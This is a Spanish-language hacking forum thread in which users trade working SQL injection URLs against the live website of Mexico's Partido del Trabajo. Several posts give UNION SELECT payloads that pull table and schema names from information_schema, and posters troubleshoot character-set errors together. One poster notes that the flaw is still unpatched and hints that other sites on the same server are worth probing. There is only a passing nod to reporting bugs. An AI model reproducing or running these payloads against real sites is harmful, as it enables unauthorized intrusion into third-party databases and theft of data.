Bueno, esté bug lo encontré yo en el partido de trabajo de méxico se encuentra en un fallo SQL, ya lo he reportado, a ver si mexico se pone las pilas en lo que es la programación web
WEB: [Enlace externo eliminado para invitados]
BUG: [Enlace externo eliminado para invitados]
Sentencia SQL correcta: [Enlace externo eliminado para invitados] ... ,5,6,7,8--
Bueno.. y lo mas interesante es qué en su servidor hay varias webs interesantes, pero eso
se los dejo a ustedes.
No seais malos y reportar los fallos.. :)
Un saludo!
Creo que estos compañeros deberian pasarse por este post viewtopic.php?f=59&t=22394
Qué estarías haciendo para dar con el bug...
No en serio, es un hobbie o algo asi?
Saludos!
No en serio, es un hobbie o algo asi?
Saludos!

"Be the change you want to see in the world"
Vaya que tienes razón yo he reportado almenos 4 vulnerabilidades en la red de la Universidad de Guadalajara (en México), los han correjido todos los que he reportado pero nisiquiera dan un gracias xD
//mHmm..
rdnmlln si, es un hobbie, jaja ^^
linklg llevas razón hay muchos bugs, y no dan ni un gracias.
Saludos!
linklg llevas razón hay muchos bugs, y no dan ni un gracias.
Saludos!
deck, hasta donde llego ese error tiene que ver con el juego de caracteres, intenta algo como esto:deck escribió:no se puede explotar ya q lo e intentao y tira error O.o jaja
Código: Seleccionar todo
http://partidodeltrabajo.org.mx/www/articulo.php?id=-1+union+all+select+0,1,2,3,4,UNHEX(HEX(group_concat(table_name))),6,7+from+information_schema.tables--
Saludos

Si se puede explotar pero en la db no hay mucha información importante
Deck, haslo de forma manual
3mp3z@ndo me has quitado el mensaje de la lengua jaja ^^
Todavia no han corregido el bug.. security off.
3mp3z@ndo me has quitado el mensaje de la lengua jaja ^^
Todavia no han corregido el bug.. security off.
muy bueno Skill! como me gusta que no seas malo y reportes bugs eres grande amigo
SALUDOS!!
SALUDOS!!
Soy un camaleón, en tu cama, leona ♪
Dr_HaCk93 escribió:muy bueno Skill! como me gusta que no seas malo y reportes bugs eres grande amigo
SALUDOS!!
Gracias dr_hack ^^
He creado un post para postear las vulneabilidades webs que encontremos los de la comunidad indetectables, espero que os paseis por hay.
http://indetectables.net/foro/viewtopic ... 59&t=22466
EDITO:
3mp3z@ndo creo que no has podido seguir bueno te dejo como quedaría.
Código: Seleccionar todo
http://partidodeltrabajo.org.mx/www/articulo.php?id=-1+union+all+select+0,1,2,3,4,UNHEX%28HEX%28group_concat%28table_name%29%29%29,6,7+from+information_schema.tables+where+table_schema=database%28%29
Lo que hace es consultar con la base de datos de la pagina, esta en flash, avisame si lo encuentras o si no a veces comprueba con un archivo, o solamente comprueba con el php.
Eeeeeem, bueno Skillmax, no se cual es el mecanismo por el cual has llegado a esa deduccion, pero en realidad yo no me he quedado atascado en ninguna parte, habrá sido un malentendido...creo recordar que he contestado a deck a un mensaje en el que decia que no se podia explotar porque le daba error, he supuesto que ha intentado hacer una inyeccion normal y le ha dado error (que es exactamente lo que pasa cuando la haces normalmente), pero por lo visto he supuesto mal porque por lo visto el se referia a que no habia admin que sacar, y bueno, solo dejé el primer paso de otra forma de explotarlo cuando sale ese error, igual le sirve a alguien que se vea en la misma situacion y no sepa avanzar en la inyeccion....en cualquier caso el dato que has dejado igualmente les servirá XD, incluso si me apuras un poco en otra web hasta les podria servir algo como:EDITO:
3mp3z@ndo creo que no has podido seguir bueno te dejo como quedaría.
Código:
[Enlace externo eliminado para invitados] ... base%28%29
Lo que hace es consultar con la base de datos de la pagina, esta en flash, avisame si lo encuentras o si no a veces comprueba con un archivo, o solamente comprueba con el php.
Código: Seleccionar todo
http://partidodeltrabajo.org.mx/www/articulo.php?id=-1+union+all+select+0,1,2,3,4,UNHEX(HEX(group_concat(table_schema,0x3a,table_name))),6,7+from+information_schema.tables--
